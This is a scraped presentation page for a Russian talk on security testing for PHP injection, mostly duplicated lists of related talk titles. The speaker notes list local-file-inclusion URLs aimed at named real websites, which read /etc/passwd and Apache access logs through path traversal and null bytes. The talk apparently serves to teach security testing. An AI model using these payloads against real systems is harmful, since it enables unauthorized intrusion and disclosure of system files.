SibeCrypt 2016. Практические методы защиты веб-приложений
SibeCrypt 2016. Практические методы защиты веб-приложенийSibeCrypt 2016. Практические методы защиты веб-приложений
SibeCrypt 2016. Практические методы защиты веб-приложений
 
Компиляция скриптов PHP (Алексей Романенко)
Компиляция скриптов PHP (Алексей Романенко)Компиляция скриптов PHP (Алексей Романенко)
Компиляция скриптов PHP (Алексей Романенко)
 
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
 
Андрей Ковалев - Безопасность сайта: мифы и реальность
Андрей Ковалев - Безопасность сайта: мифы и реальностьАндрей Ковалев - Безопасность сайта: мифы и реальность
Андрей Ковалев - Безопасность сайта: мифы и реальность
 
Защита сайта от взлома и вирусов
Защита сайта от взлома и вирусовЗащита сайта от взлома и вирусов
Защита сайта от взлома и вирусов
 
PHP
PHPPHP
PHP
 
Easy selenium test automation on python
Easy selenium test automation on pythonEasy selenium test automation on python
Easy selenium test automation on python
 
DUMP-2012 - Веб-разработка - "Что мы знаем о производительности и безопасност...
DUMP-2012 - Веб-разработка - "Что мы знаем о производительности и безопасност...DUMP-2012 - Веб-разработка - "Что мы знаем о производительности и безопасност...
DUMP-2012 - Веб-разработка - "Что мы знаем о производительности и безопасност...
 
Alexander manuhin selenium_php_v2.0
Alexander manuhin selenium_php_v2.0Alexander manuhin selenium_php_v2.0
Alexander manuhin selenium_php_v2.0
 
Спецификация WSGI (PEP-333)
Спецификация WSGI (PEP-333)Спецификация WSGI (PEP-333)
Спецификация WSGI (PEP-333)
 

More from SQALab

Готовим стажировку
Готовим стажировкуГотовим стажировку
Готовим стажировку
SQALab
 
Куда приводят мечты? или Искусство развития тестировщика
Куда приводят мечты? или Искусство развития тестировщикаКуда приводят мечты? или Искусство развития тестировщика
Куда приводят мечты? или Искусство развития тестировщика
SQALab
 
Оптимизация Selenium тестов и ускорение их поддержки
Оптимизация Selenium тестов и ускорение их поддержкиОптимизация Selenium тестов и ускорение их поддержки
Оптимизация Selenium тестов и ускорение их поддержки
SQALab
 
Автоматизация 0.0: 0 - бюджет, 0 - опыт программирования
Автоматизация 0.0: 0 - бюджет, 0 - опыт программированияАвтоматизация 0.0: 0 - бюджет, 0 - опыт программирования
Автоматизация 0.0: 0 - бюджет, 0 - опыт программирования
SQALab
 
Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...
Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...
Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...
SQALab
 
Continuous performance testing
Continuous performance testingContinuous performance testing
Continuous performance testing
SQALab
 
Конфиги вместо костылей. Pytestconfig и зачем он нужен
Конфиги вместо костылей. Pytestconfig и зачем он нуженКонфиги вместо костылей. Pytestconfig и зачем он нужен
Конфиги вместо костылей. Pytestconfig и зачем он нужен
SQALab
 
Команда чемпионов в ИТ стихии
Команда чемпионов в ИТ стихииКоманда чемпионов в ИТ стихии
Команда чемпионов в ИТ стихии
SQALab
 
API. Серебряная пуля в магазине советов
API. Серебряная пуля в магазине советовAPI. Серебряная пуля в магазине советов
API. Серебряная пуля в магазине советов
SQALab
 
Добиваемся эффективности каждого из 9000+ UI-тестов
Добиваемся эффективности каждого из 9000+ UI-тестовДобиваемся эффективности каждого из 9000+ UI-тестов
Добиваемся эффективности каждого из 9000+ UI-тестов
SQALab
 
Делаем автоматизацию проектных KPIs
Делаем автоматизацию проектных KPIsДелаем автоматизацию проектных KPIs
Делаем автоматизацию проектных KPIs
SQALab
 
Вредные привычки в тест-менеджменте
Вредные привычки в тест-менеджментеВредные привычки в тест-менеджменте
Вредные привычки в тест-менеджменте
SQALab
 
Мощь переполняет с JDI 2.0 - новая эра UI автоматизации
Мощь переполняет с JDI 2.0 - новая эра UI автоматизацииМощь переполняет с JDI 2.0 - новая эра UI автоматизации
Мощь переполняет с JDI 2.0 - новая эра UI автоматизации
SQALab
 
Как hh.ru дошли до 500 релизов в квартал без потери в качестве
Как hh.ru дошли до 500 релизов в квартал без потери в качествеКак hh.ru дошли до 500 релизов в квартал без потери в качестве
Как hh.ru дошли до 500 релизов в квартал без потери в качестве
SQALab
 
Стили лидерства и тестирование
Стили лидерства и тестированиеСтили лидерства и тестирование
Стили лидерства и тестирование
SQALab
 
"Давайте не будем про качество"
"Давайте не будем про качество""Давайте не будем про качество"
"Давайте не будем про качество"
SQALab
 
Apache.JMeter для .NET-проектов
Apache.JMeter для .NET-проектовApache.JMeter для .NET-проектов
Apache.JMeter для .NET-проектов
SQALab
 
Тестирование геолокационных систем
Тестирование геолокационных системТестирование геолокационных систем
Тестирование геолокационных систем
SQALab
 
Лидер или босс? Вот в чем вопрос
Лидер или босс? Вот в чем вопросЛидер или босс? Вот в чем вопрос
Лидер или босс? Вот в чем вопрос
SQALab
 
От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...
От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...
От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...
SQALab
 

More from SQALab (20)

Готовим стажировку
Готовим стажировкуГотовим стажировку
Готовим стажировку
 
Куда приводят мечты? или Искусство развития тестировщика
Куда приводят мечты? или Искусство развития тестировщикаКуда приводят мечты? или Искусство развития тестировщика
Куда приводят мечты? или Искусство развития тестировщика
 
Оптимизация Selenium тестов и ускорение их поддержки
Оптимизация Selenium тестов и ускорение их поддержкиОптимизация Selenium тестов и ускорение их поддержки
Оптимизация Selenium тестов и ускорение их поддержки
 
Автоматизация 0.0: 0 - бюджет, 0 - опыт программирования
Автоматизация 0.0: 0 - бюджет, 0 - опыт программированияАвтоматизация 0.0: 0 - бюджет, 0 - опыт программирования
Автоматизация 0.0: 0 - бюджет, 0 - опыт программирования
 
Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...
Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...
Нагрузочное тестирование нестандартных протоколов с использованием Citrix и J...
 
Continuous performance testing
Continuous performance testingContinuous performance testing
Continuous performance testing
 
Конфиги вместо костылей. Pytestconfig и зачем он нужен
Конфиги вместо костылей. Pytestconfig и зачем он нуженКонфиги вместо костылей. Pytestconfig и зачем он нужен
Конфиги вместо костылей. Pytestconfig и зачем он нужен
 
Команда чемпионов в ИТ стихии
Команда чемпионов в ИТ стихииКоманда чемпионов в ИТ стихии
Команда чемпионов в ИТ стихии
 
API. Серебряная пуля в магазине советов
API. Серебряная пуля в магазине советовAPI. Серебряная пуля в магазине советов
API. Серебряная пуля в магазине советов
 
Добиваемся эффективности каждого из 9000+ UI-тестов
Добиваемся эффективности каждого из 9000+ UI-тестовДобиваемся эффективности каждого из 9000+ UI-тестов
Добиваемся эффективности каждого из 9000+ UI-тестов
 
Делаем автоматизацию проектных KPIs
Делаем автоматизацию проектных KPIsДелаем автоматизацию проектных KPIs
Делаем автоматизацию проектных KPIs
 
Вредные привычки в тест-менеджменте
Вредные привычки в тест-менеджментеВредные привычки в тест-менеджменте
Вредные привычки в тест-менеджменте
 
Мощь переполняет с JDI 2.0 - новая эра UI автоматизации
Мощь переполняет с JDI 2.0 - новая эра UI автоматизацииМощь переполняет с JDI 2.0 - новая эра UI автоматизации
Мощь переполняет с JDI 2.0 - новая эра UI автоматизации
 
Как hh.ru дошли до 500 релизов в квартал без потери в качестве
Как hh.ru дошли до 500 релизов в квартал без потери в качествеКак hh.ru дошли до 500 релизов в квартал без потери в качестве
Как hh.ru дошли до 500 релизов в квартал без потери в качестве
 
Стили лидерства и тестирование
Стили лидерства и тестированиеСтили лидерства и тестирование
Стили лидерства и тестирование
 
"Давайте не будем про качество"
"Давайте не будем про качество""Давайте не будем про качество"
"Давайте не будем про качество"
 
Apache.JMeter для .NET-проектов
Apache.JMeter для .NET-проектовApache.JMeter для .NET-проектов
Apache.JMeter для .NET-проектов
 
Тестирование геолокационных систем
Тестирование геолокационных системТестирование геолокационных систем
Тестирование геолокационных систем
 
Лидер или босс? Вот в чем вопрос
Лидер или босс? Вот в чем вопросЛидер или босс? Вот в чем вопрос
Лидер или босс? Вот в чем вопрос
 
От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...
От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...
От Зефира в коробке к Structure Zephyr или как тест-менеджеру перекроить внут...
 

Тестирование безопасности: PHP инъекция

Editor's Notes

  1. http://news.netcraft.com/archives/2013/01/31/php-just-grows-grows.html
  2. http://forum.antichat.ru/threadnav246807-2-10.html
  3. http://www.supcourt.by/cgi-bin/index.cgi?m1=1&amp;m2=1&amp;vd=%207&amp;vm=d&amp;vr=../../../../../../../../../../etc/passwd%00 http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00 http://museum.nhm.uga.edu/index.php?page=../../../../../etc/passwd%00
  4. http://www.supcourt.by/cgi-bin/index.cgi?m1=1&amp;m2=1&amp;vd=%207&amp;vm=d&amp;vr=../../../../../../../../../../etc/passwd%00 http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00 http://museum.nhm.uga.edu/index.php?page=../../../../../etc/passwd%00
  5. http://www.supcourt.by/cgi-bin/index.cgi?m1=1&amp;m2=1&amp;vd=%207&amp;vm=d&amp;vr=../../../../../../../../../../etc/passwd%00 http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00 http://museum.nhm.uga.edu/index.php?page=../../../../../etc/passwd%00
  6. http://www.supcourt.by/cgi-bin/index.cgi?m1=1&amp;m2=1&amp;vd=%207&amp;vm=d&amp;vr=../../../../../../../../../../etc/passwd%00 http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00 http://museum.nhm.uga.edu/index.php?page=../../../../../etc/passwd%00
  7. http://www.supcourt.by/cgi-bin/index.cgi?m1=1&amp;m2=1&amp;vd=%207&amp;vm=d&amp;vr=../../../../../../../../../../etc/passwd%00 http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00 http://museum.nhm.uga.edu/index.php?page=../../../../../etc/passwd%00
  8. http://www.supcourt.by/cgi-bin/index.cgi?m1=1&amp;m2=1&amp;vd=%207&amp;vm=d&amp;vr=../../../../../../../../../../etc/passwd%00 http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00 http://museum.nhm.uga.edu/index.php?page=../../../../../etc/passwd%00
  9. http://www.ecwatech.ru/2014/index.php?content=../../../../../../../../../../usr/local/apache/logs/access_log%00 http://citypipe.ru/index.php?content=../../../../../../../../../../usr/local/apache/logs/access_log%00
  10. http://www.ecwatech.ru/2014/index.php?content=../../../../../../../../../../usr/local/apache/logs/access_log%00 http://citypipe.ru/index.php?content=../../../../../../../../../../usr/local/apache/logs/access_log%00
  11. http://www.sghp.ru/index.php?page=index.php
  12. Acunetix – 300 евро лицензия на один сайт. RATS - is a security auditing utility for C, C++, PHP, Perl, and Python code. RPVS – французский разработчик